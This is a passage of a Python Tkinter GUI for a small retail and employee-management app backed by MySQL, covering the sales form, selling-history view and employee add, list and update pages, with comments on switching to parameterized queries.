    alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=90, y=530)
def sales_button_clicked():
    """Switch the content area to the 'Sales' page.

    Builds the product-details and customer-details form.  The nested
    ``search`` pre-fills product name/category from a product ID; the
    nested ``sale`` records the sale: it upserts the customer row,
    inserts into Sell, and removes the product from stock.
    Closure over ``self`` (the enclosing page object).
    """
    # Highlight this section's nav button; reset every other one.
    self.dashboard_button.config(bg='#292B37')
    self.show_products_button.config(bg='#292B37')
    self.add_products_button.config(bg='#292B37')
    self.update_products_button.config(bg='#292B37')
    self.delete_products_button.config(bg='#292B37')
    self.sales_button.config(bg='#3C3F4A')
    self.selling_history_button.config(bg='#292B37')
    self.show_employees_button.config(bg='#292B37')
    self.add_employees_button.config(bg='#292B37')
    self.update_employees_button.config(bg='#292B37')
    self.delete_employees_button.config(bg='#292B37')

    def sale():
        """Validate the form and record the sale in the database."""
        def disappear_alert_label():
            # Best effort: the label may already have been destroyed.
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass

        product_name = product_name_entry.get()
        product_id = product_id_entry.get()
        selling_price = selling_price_entry.get()
        product_category = product_category_entry.get()
        dos = dos_entry.get()
        customer_name = customer_name_entry.get()
        phone = phone_entry.get()
        email = email_entry.get()
        address = address_entry.get()
        if '' in (product_name, product_id, selling_price, product_category, dos,
                  customer_name, phone, email, address):
            alert_label.config(text='Fill up all the fields..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
            return
        try:
            db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
            my_cursor = db.cursor()
            # All queries are parameterized; the previous f-string
            # versions were open to SQL injection via the form fields.
            my_cursor.execute('SELECT * FROM product WHERE Product_ID = %s', (product_id,))
            product = my_cursor.fetchall()
            if len(product) == 0:
                alert_label.config(text='Oops! Product not available', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
            else:
                # Upsert the customer, keyed by phone number.
                my_cursor.execute('SELECT * FROM customer WHERE Phone_Number = %s', (phone,))
                customer = my_cursor.fetchall()
                if len(customer) == 0:
                    my_cursor.execute(
                        'INSERT INTO customer (Full_Name, Email, Phone_Number, Address) '
                        'VALUES (%s, %s, %s, %s);',
                        (customer_name, email, phone, address))
                else:
                    my_cursor.execute(
                        'UPDATE customer SET Full_Name = %s, Email = %s, Address = %s '
                        'WHERE Phone_Number = %s;',
                        (customer_name, email, address, phone))
                db.commit()
                # Record the sale and remove the product from stock.
                # (This block was previously duplicated verbatim in both
                # the new- and existing-customer branches.)
                my_cursor.execute('SELECT Customer_ID FROM customer WHERE Phone_Number = %s;', (phone,))
                customer_id = my_cursor.fetchone()[0]
                my_cursor.execute('SELECT Price FROM product WHERE Product_ID = %s;', (product_id,))
                purchase_price = my_cursor.fetchone()[0]
                my_cursor.execute(
                    'INSERT INTO Sell (Customer_ID, Product_ID, Product_Name, Product_Category, '
                    'Purchase_Price, Selling_Price, DOS) VALUES (%s, %s, %s, %s, %s, %s, %s);',
                    (int(customer_id), product_id, product_name, product_category,
                     float(purchase_price), float(selling_price), dos))
                db.commit()
                my_cursor.execute('DELETE FROM product WHERE Product_ID = %s', (product_id,))
                db.commit()
                alert_label.config(text='Product has been sold..', bg='#2FA422', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
                for entry in (product_id_entry, product_name_entry, selling_price_entry,
                              product_category_entry, dos_entry, customer_name_entry,
                              phone_entry, email_entry, address_entry):
                    entry.delete(0, 'end')
            db.close()  # fix: the connection was previously left open
        except Exception:
            alert_label.config(text='Oops! Something went wrong..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)

    def search():
        """Pre-fill product name/category from the typed product ID."""
        def disappear_alert_label():
            # Best effort: the label may already have been destroyed.
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass

        searched_product_id = product_id_entry.get()
        if searched_product_id == '':
            alert_label.config(text='Enter a product id..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
        else:
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized lookup (was an injectable f-string).
                my_cursor.execute('SELECT * FROM product WHERE Product_ID = %s', (searched_product_id,))
                product = my_cursor.fetchall()
                db.close()  # fix: the connection was previously left open
                if len(product) == 0:
                    product_name_entry.delete(0, 'end')
                    product_category_entry.delete(0, 'end')
                    alert_label.config(text='Oops! Product not available', bg='#AA2F2F', fg='white')
                    self.content_frame.after(1500, disappear_alert_label)
                else:
                    product_name_entry.delete(0, 'end')
                    product_category_entry.delete(0, 'end')
                    product_name_entry.insert(0, product[0][1])
                    product_category_entry.insert(0, product[0][2])
            except Exception:
                alert_label.config(text='Sorry! Unable to load data..', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

    # Rebuild the content area from scratch.
    for widget in self.content_frame.winfo_children():
        widget.destroy()
    sales_bg_label = Label(self.content_frame, image=self.sales_bg_image)
    sales_bg_label.place(x=-2, y=-2)
    sales_label = Label(self.content_frame, text='SALES', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    sales_label.place(x=50, y=40)
    product_details_label = Label(self.content_frame, text='PRODUCT DETAILS', font=('Arial Rounded MT', 12, 'bold'), bg='#333646', fg='#BBBBBB')
    product_details_label.place(x=65, y=101)
    product_id_label = Label(self.content_frame, text='Product ID', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    product_id_label.place(x=96, y=145)
    product_name_label = Label(self.content_frame, text='Product Name', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    product_name_label.place(x=96, y=182)
    selling_price_label = Label(self.content_frame, text='Selling Price', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    selling_price_label.place(x=96, y=220)
    product_category_label = Label(self.content_frame, text='Product Category', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    product_category_label.place(x=96, y=257)
    dos_label = Label(self.content_frame, text='Date Of Sell', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    dos_label.place(x=96, y=294)
    customer_details_label = Label(self.content_frame, text='CUSTOMER DETAILS', font=('Arial Rounded MT', 12, 'bold'), bg='#333646', fg='#BBBBBB')
    customer_details_label.place(x=65, y=345)
    customer_name_label = Label(self.content_frame, text='Customer Name', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    customer_name_label.place(x=96, y=388)
    phone_label = Label(self.content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    phone_label.place(x=96, y=425)
    email_label = Label(self.content_frame, text='E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    email_label.place(x=96, y=462)
    address_label = Label(self.content_frame, text='Address', font=('Arial Rounded MT', 11, 'bold'), bg='#333646', fg='white')
    address_label.place(x=96, y=499)
    product_id_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    product_id_entry.place(x=247, y=150)
    product_name_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    product_name_entry.place(x=247, y=186)
    selling_price_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    selling_price_entry.place(x=247, y=222)
    product_category_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    product_category_entry.place(x=247, y=258)
    dos_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    dos_entry.place(x=247, y=294)
    customer_name_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    customer_name_entry.place(x=247, y=391)
    phone_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    phone_entry.place(x=247, y=427)
    email_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    email_entry.place(x=247, y=463)
    address_entry = Entry(self.content_frame, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', fg='white', borderwidth=0, width=56)
    address_entry.place(x=247, y=499)
    search_button = Button(self.content_frame, cursor='hand2', image=self.search_button_icon_image, borderwidth=0, activebackground='#686972', bg='#686972', command=search)
    search_button.place(x=677, y=150)
    ok_button = Button(self.content_frame, cursor='hand2', image=self.ok_button_image, borderwidth=0, activebackground='#292B37', bg='#292B37', command=sale)
    ok_button.place(x=675, y=565)
    # Alert label starts invisible (fg == bg); callbacks recolor it.
    alert_label = Label(self.content_frame, width=32, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=90, y=565)
def selling_history_button_clicked():
    """Switch the content area to the scrollable 'Selling History' page.

    Builds a Canvas + Scrollbar viewport, then renders one card per row
    of the Sell/Customer join.  Closure over ``self``.
    """
    # Highlight this section's nav button; reset every other one.
    self.dashboard_button.config(bg='#292B37')
    self.show_products_button.config(bg='#292B37')
    self.add_products_button.config(bg='#292B37')
    self.update_products_button.config(bg='#292B37')
    self.delete_products_button.config(bg='#292B37')
    self.sales_button.config(bg='#292B37')
    self.selling_history_button.config(bg='#3C3F4A')
    self.show_employees_button.config(bg='#292B37')
    self.add_employees_button.config(bg='#292B37')
    self.update_employees_button.config(bg='#292B37')
    self.delete_employees_button.config(bg='#292B37')
    for widget in self.content_frame.winfo_children():
        widget.destroy()

    # Only scroll with the wheel while the pointer is over the list.
    def bound_to_mousewheel(event):
        showall_canvas.bind_all("<MouseWheel>", on_mousewheel)

    def unbound_to_mousewheel(event):
        showall_canvas.unbind_all("<MouseWheel>")

    def on_mousewheel(event):
        # Windows reports wheel deltas in multiples of 120.
        showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")

    temp_frame = Frame(self.content_frame, width=960, height=514, bg='#292B37', border=None)
    temp_frame.place(x=2, y=115)
    showall_canvas = Canvas(temp_frame, width=960, height=514, bg='#292B37')
    vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
    vertical_bar.pack(side=RIGHT, fill='y')
    showall_canvas.config(yscrollcommand=vertical_bar.set)  # (was configured twice)
    final_frame = Frame(temp_frame, width=960, height=514, bg='#292B37')
    showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
    showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
    final_frame.bind('<Enter>', bound_to_mousewheel)
    final_frame.bind('<Leave>', unbound_to_mousewheel)
    # Frames that cover the canvas border on three sides.
    border_hide_frame1 = Frame(self.content_frame, bg='#292B37', height=7, width=958)
    border_hide_frame1.place(x=6, y=111)
    border_hide_frame2 = Frame(self.content_frame, bg='#292B37', height=638, width=7)
    border_hide_frame2.place(x=-1, y=111)
    border_hide_frame3 = Frame(self.content_frame, bg='#292B37', height=519, width=7)
    border_hide_frame3.place(x=959, y=112)
    showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
    selling_history_bg_frame = Frame(self.content_frame, bg='#292B37', height=107, width=958)
    selling_history_bg_frame.place(x=2, y=9)
    selling_history_bg_label = Label(selling_history_bg_frame, image=self.show_employees_bg_image, bg='#292B37')
    selling_history_bg_label.place(x=-2, y=-2)
    selling_history_label = Label(selling_history_bg_frame, text='SELLING HISTORY', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    selling_history_label.place(x=50, y=40)
    try:
        db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
        my_cursor = db.cursor()
        # No user input in this query, so no parameters are needed.
        query = ('SELECT Sell.Product_ID, Sell.Product_Name, Sell.Product_Category, '
                 'Sell.Purchase_Price, Sell.Selling_Price, Sell.DOS, Customer.Full_Name, '
                 'Customer.Phone_Number, Customer.Email, Customer.Address '
                 'FROM Sell, Customer WHERE Sell.Customer_ID = Customer.Customer_ID')
        my_cursor.execute(query)
        sells = my_cursor.fetchall()
        db.close()  # fix: the connection was previously left open
        # One card per sale; iterate rows directly instead of range(len(...)).
        for sell in sells:
            sell_frame = Frame(final_frame, bg='#292B37', height=393, width=958)
            sell_frame_bg_label = Label(sell_frame, image=self.selling_history_bg_image, bg='#292B37')
            sell_frame_bg_label.place(x=-2, y=-2)
            selling_details_label = Label(sell_frame, text='Selling Details', font=('Arial Rounded MT', 14, 'bold'), bg='#50515B', fg='#BBBBBB')
            selling_details_label.place(x=51, y=27)
            product_name_label = Label(sell_frame, text=sell[1], font=('Arial Rounded MT', 16, 'bold'), bg='#50515B', fg='white')
            product_name_label.place(x=82, y=70)
            selling_price_label = Label(sell_frame, text='$ ' + str(sell[4]), font=('Arial Rounded MT', 10, 'bold'), bg='#50515B', fg='white')
            selling_price_label.place(x=82, y=96)
            product_id_label = Label(sell_frame, text=f'Product ID : {sell[0]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            product_id_label.place(x=82, y=123)
            product_category_label = Label(sell_frame, text=f'Category : {sell[2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            product_category_label.place(x=82, y=152)
            date_of_sell_label = Label(sell_frame, text=f'Date of Sale : {sell[5]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            date_of_sell_label.place(x=82, y=181)
            # Profit = selling price - purchase price.
            profit_label = Label(sell_frame, text=f'Profit : {sell[4] - sell[3]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            profit_label.place(x=82, y=210)
            customer_name_label = Label(sell_frame, text=f'Customer Name : {sell[6]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            customer_name_label.place(x=82, y=250)
            phone_label = Label(sell_frame, text=f'Phone Number : {sell[7]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            phone_label.place(x=82, y=278)
            email_label = Label(sell_frame, text=f'E-mail : {sell[8]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            email_label.place(x=82, y=306)
            address_label = Label(sell_frame, text=f'Address : {sell[9]}', font=('Arial Rounded MT', 11, 'bold'), bg='#50515B', fg='white')
            address_label.place(x=82, y=335)
            sell_frame.pack()
    except Exception as e:
        # Page is best-effort; log the failure to the console.
        print(e)
def show_employees_button_clicked():
    """Render the 'Show Employees' view.

    Highlights the sidebar button, rebuilds the scrollable content area,
    and lists every non-Owner user fetched from the database.
    """
    # Reset every sidebar button, then highlight the active one.
    for button in (self.dashboard_button, self.show_products_button,
                   self.add_products_button, self.update_products_button,
                   self.delete_products_button, self.sales_button,
                   self.selling_history_button, self.add_employees_button,
                   self.update_employees_button, self.delete_employees_button):
        button.config(bg='#292B37')
    self.show_employees_button.config(bg='#3C3F4A')
    # Clear whatever the previous view left in the content area.
    for widget in self.content_frame.winfo_children():
        widget.destroy()

    # Mouse-wheel scrolling is only active while the pointer is over the list.
    def bound_to_mousewheel(event):
        showall_canvas.bind_all("<MouseWheel>", on_mousewheel)

    def unbound_to_mousewheel(event):
        showall_canvas.unbind_all("<MouseWheel>")

    def on_mousewheel(event):
        # Windows reports wheel deltas in multiples of 120.
        showall_canvas.yview_scroll(int(-1 * (event.delta / 120)), "units")

    temp_frame = Frame(self.content_frame, width=960, height=514, bg='#292B37', border=None)
    temp_frame.place(x=2, y=115)
    showall_canvas = Canvas(temp_frame, width=960, height=514, bg='#292B37')
    vertical_bar = ttk.Scrollbar(temp_frame, orient='vertical', command=showall_canvas.yview)
    vertical_bar.pack(side=RIGHT, fill='y')
    # NOTE: the original configured yscrollcommand twice; once is enough.
    showall_canvas.config(yscrollcommand=vertical_bar.set)
    final_frame = Frame(temp_frame, width=960, height=514, bg='#292B37')
    showall_canvas.create_window((0, 0), window=final_frame, anchor='nw')
    showall_canvas.bind('<Configure>', lambda e: showall_canvas.configure(scrollregion=showall_canvas.bbox('all')))
    final_frame.bind('<Enter>', bound_to_mousewheel)
    final_frame.bind('<Leave>', unbound_to_mousewheel)
    # Thin frames that mask the canvas border so the view looks seamless.
    border_hide_frame1 = Frame(self.content_frame, bg='#292B37', height=7, width=958)
    border_hide_frame1.place(x=6, y=111)
    border_hide_frame2 = Frame(self.content_frame, bg='#292B37', height=638, width=7)
    border_hide_frame2.place(x=-1, y=111)
    border_hide_frame3 = Frame(self.content_frame, bg='#292B37', height=519, width=7)
    border_hide_frame3.place(x=959, y=112)
    showall_canvas.pack(side=LEFT, expand=True, fill=BOTH)
    show_employees_bg_frame = Frame(self.content_frame, bg='#292B37', height=107, width=958)
    show_employees_bg_frame.place(x=2, y=9)
    show_employees_bg_label = Label(show_employees_bg_frame, image=self.show_employees_bg_image, bg='#292B37')
    show_employees_bg_label.place(x=-2, y=-2)
    show_employees_label = Label(show_employees_bg_frame, text='SHOW EMPLOYEE INFORMATION', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    show_employees_label.place(x=50, y=40)
    try:
        db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
        my_cursor = db.cursor()
        # Static query (no user input), so no parameters are needed;
        # the Owner account is never listed alongside regular employees.
        my_cursor.execute('SELECT * FROM user_table WHERE NOT Designation = "Owner"')
        employees = my_cursor.fetchall()
        db.close()  # the original leaked this connection
        for employee in employees:
            employee_frame = Frame(final_frame, bg='#292B37', height=340, width=958)
            employee_frame_bg_label = Label(employee_frame, image=self.show_employee_bg_image, bg='#292B37')
            employee_frame_bg_label.place(x=-2, y=-2)
            # Row layout used below: 0=name, 1=email, 2=phone, 3=address,
            # 5=designation, 6=username, 8=salary (same indices as the
            # update/delete handlers in this file).
            fullname_label = Label(employee_frame, text=employee[0], font=('Arial Rounded MT', 20, 'bold'), bg='#292B37', fg='white')
            fullname_label.place(x=58, y=22)
            designation_label = Label(employee_frame, text=employee[5], font=('Arial Rounded MT', 15, 'bold'), bg='#292B37', fg='white')
            designation_label.place(x=58, y=72)
            username_label = Label(employee_frame, text=f'Username : {employee[6]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            username_label.place(x=58, y=126)
            salary_label = Label(employee_frame, text=f'Salary : {employee[8]} $', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            salary_label.place(x=58, y=162)
            phone_label = Label(employee_frame, text=f'Phone Number : {employee[2]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            phone_label.place(x=58, y=198)
            email_label = Label(employee_frame, text=f'E-mail : {employee[1]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            email_label.place(x=58, y=234)
            address_label = Label(employee_frame, text=f'Address : {employee[3]}', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            address_label.place(x=58, y=270)
            employee_frame.pack()
    except Exception as e:
        print(e)
def add_employees_button_clicked():
    """Render the 'Add Employees' form and wire up its save handler."""
    # Reset every sidebar button, then highlight the active one.
    for button in (self.dashboard_button, self.show_products_button,
                   self.add_products_button, self.update_products_button,
                   self.delete_products_button, self.sales_button,
                   self.selling_history_button, self.show_employees_button,
                   self.update_employees_button, self.delete_employees_button):
        button.config(bg='#292B37')
    self.add_employees_button.config(bg='#3C3F4A')
    # Clear whatever the previous view left in the content area.
    for widget in self.content_frame.winfo_children():
        widget.destroy()

    def add():
        """Validate the form and insert a new employee row."""
        def disappear_alert_label():
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass  # the label may already have been destroyed

        employee_name = employee_name_entry.get()
        username = username_entry.get()
        password = password_entry.get()
        phone_number = phone_number_entry.get()
        salary = salary_entry.get()
        designation = designation_entry.get()
        if '' in (employee_name, username, password, phone_number, salary, designation):
            alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
        elif designation.lower() == 'owner':
            # Refuse to create another Owner-designated account.
            alert_label.config(text='Sorry! Invalid input..', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
        else:
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized query: the original interpolated raw entry
                # text straight into the SQL string (injection risk and
                # broken quoting for names containing quotes).
                my_cursor.execute(
                    'INSERT INTO user_table '
                    '(Full_Name, Phone_Number, Designation, UserName, User_Password, Salary) '
                    'VALUES (%s, %s, %s, %s, %s, %s)',
                    (employee_name, phone_number, designation, username, password, salary))
                db.commit()
                db.close()
                alert_label.config(text='Employee added successfully..', bg='#2FA422', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
                # Reset the form for the next entry.
                for entry in (employee_name_entry, username_entry, password_entry,
                              phone_number_entry, salary_entry, designation_entry):
                    entry.delete(0, 'end')
            except Exception:
                alert_label.config(text='Sorry! Invalid input..', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

    add_employees_bg_label = Label(self.content_frame, image=self.add_employees_bg_image)
    add_employees_bg_label.place(x=-2, y=-2)
    add_employees_label = Label(self.content_frame, text='ADD EMPLOYEES', font=('Arial Rounded MT', 14, 'bold'), bg='#292B37', fg='#BBBBBB')
    add_employees_label.place(x=50, y=50)
    employee_name_label = Label(self.content_frame, text='Employee Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    employee_name_label.place(x=106, y=136)
    username_label = Label(self.content_frame, text='Username', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    username_label.place(x=106, y=200)
    password_label = Label(self.content_frame, text='Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    password_label.place(x=106, y=260)
    phone_number_label = Label(self.content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    phone_number_label.place(x=106, y=322)
    salary_label = Label(self.content_frame, text='Salary', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    salary_label.place(x=106, y=383)
    designation_label = Label(self.content_frame, text='Designation', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
    designation_label.place(x=106, y=446)
    employee_name_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    employee_name_entry.place(x=281, y=138)
    username_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    username_entry.place(x=281, y=200)
    password_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    password_entry.place(x=281, y=262)
    phone_number_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    phone_number_entry.place(x=281, y=324)
    salary_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    salary_entry.place(x=281, y=387)
    designation_entry = Entry(self.content_frame, width=70, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
    designation_entry.place(x=281, y=448)
    add_employee_button = Button(self.content_frame, cursor='hand2', image=self.add_employee_button_image, borderwidth=0, activebackground='#292B37', font=('Arial Rounded MT', 10), bg='#292B37', command=add)
    add_employee_button.place(x=722, y=523)
    # Alert label starts invisible (fg == bg) and is recolored on demand.
    alert_label = Label(self.content_frame, width=30, height=2, text='Sorry, Invalid input..', font=('Arial Rounded MT', 10, 'bold'), bg='#292B37', fg='#292B37')
    alert_label.place(x=106, y=523)
def update_employees_button_clicked():
    """Render the 'Update Employee' view.

    Lets the user look up an employee by username, shows an editable form
    pre-filled with the current values, and saves the changes back.
    """
    # Reset every sidebar button, then highlight the active one.
    for button in (self.dashboard_button, self.show_products_button,
                   self.add_products_button, self.update_products_button,
                   self.delete_products_button, self.sales_button,
                   self.selling_history_button, self.show_employees_button,
                   self.add_employees_button, self.delete_employees_button):
        button.config(bg='#292B37')
    self.update_employees_button.config(bg='#3C3F4A')
    # Clear whatever the previous view left in the content area.
    # (The original cleared it twice; once is enough.)
    for widget in self.content_frame.winfo_children():
        widget.destroy()

    def search():
        """Look up the typed username and build the edit form for it."""
        def disappear_alert_label():
            try:
                alert_label.config(bg='#292B37', fg='#292B37')
            except Exception:
                pass  # the label may already have been destroyed

        def update():
            """Write the edited fields back to the database."""
            fullname = fullname_edit.get()
            email = email_edit.get()
            phone = phone_edit.get()
            address = address_edit.get()
            dob = dob_edit.get()
            designation = designation_edit.get()
            password = password_edit.get()
            salary = salary_edit.get()
            if '' in (fullname, email, phone, address, dob, designation, password, salary):
                alert_label.config(text='Fill up all the fields', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
                return
            try:
                db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
                my_cursor = db.cursor()
                # Parameterized query: the original interpolated form text
                # straight into the SQL string (injection risk / broken
                # quoting for values containing quotes).
                my_cursor.execute(
                    'UPDATE user_table SET Full_Name = %s, Email = %s, Phone_Number = %s, '
                    'Address = %s, DOB = %s, Designation = %s, User_Password = %s, Salary = %s '
                    'WHERE UserName = %s',
                    (fullname, email, phone, address, dob, designation, password, salary,
                     searched_username))
                db.commit()
                db.close()
                for widget in self.update_content_frame.winfo_children():
                    widget.destroy()
                search_edit.delete(0, 'end')
                alert_label.config(text='Employee updated Successfully..', bg='#2FA422', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
            except Exception:
                alert_label.config(text='Sorry! Unable to update', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)

        searched_username = search_edit.get()
        if searched_username == '':
            alert_label.config(text='Enter a Username', bg='#AA2F2F', fg='white')
            self.content_frame.after(1500, disappear_alert_label)
            return
        for widget in self.update_content_frame.winfo_children():
            widget.destroy()
        try:
            db = mysql.connector.connect(host='localhost', user='root', passwd='', database='Easy_Dealer')
            my_cursor = db.cursor()
            # Parameterized lookup (original used an f-string).
            my_cursor.execute('SELECT * FROM user_table WHERE UserName = %s', (searched_username,))
            employee = my_cursor.fetchall()
            db.close()  # the original leaked this connection
            # NOTE(review): 'karim' looks like a hard-coded protected
            # account; confirm whether this should really be a literal.
            if len(employee) == 0 or searched_username == 'karim':
                alert_label.config(text='Employee doesn\'t exists', bg='#AA2F2F', fg='white')
                self.content_frame.after(1500, disappear_alert_label)
                return
            # Column layout: 0=name, 1=email, 2=phone, 3=address, 4=dob,
            # 5=designation, 7=password, 8=salary. NULLs become ''.
            row = employee[0]
            fullname = row[0]
            email = row[1] if row[1] is not None else ''
            phone = row[2]
            address = row[3] if row[3] is not None else ''
            dob = row[4] if row[4] is not None else ''
            designation = row[5]
            password = row[7]
            salary = row[8]
            update_employee_content_bg_label = Label(self.update_content_frame, image=self.update_employee_content_bg_image, bd=0)
            update_employee_content_bg_label.place(x=0, y=0)
            fullname_label = Label(self.update_content_frame, text='Name', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            fullname_label.place(x=14, y=37)
            password_label = Label(self.update_content_frame, text='Password', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            password_label.place(x=14, y=107)
            designation_label = Label(self.update_content_frame, text='Designation', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            designation_label.place(x=14, y=177)
            salary_label = Label(self.update_content_frame, text='Salary', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            salary_label.place(x=14, y=243)
            email_label = Label(self.update_content_frame, text='E-mail', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            email_label.place(x=475, y=37)
            address_label = Label(self.update_content_frame, text='Address', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            address_label.place(x=475, y=111)
            phone_label = Label(self.update_content_frame, text='Phone Number', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            phone_label.place(x=475, y=177)
            dob_label = Label(self.update_content_frame, text='Date of birth', font=('Arial Rounded MT', 11, 'bold'), bg='#292B37', fg='white')
            dob_label.place(x=475, y=243)
            fullname_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            fullname_edit.place(x=135, y=39)
            password_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            password_edit.place(x=135, y=109)
            designation_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            designation_edit.place(x=135, y=179)
            salary_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            salary_edit.place(x=135, y=248)
            email_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            email_edit.place(x=625, y=39)
            address_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            address_edit.place(x=625, y=109)
            phone_edit = Entry(self.update_content_frame, width=34, font=('Arial Rounded MT', 11, 'bold'), bg='#686972', borderwidth=0, fg='white')
            phone_edit.place(x=625, y=179)
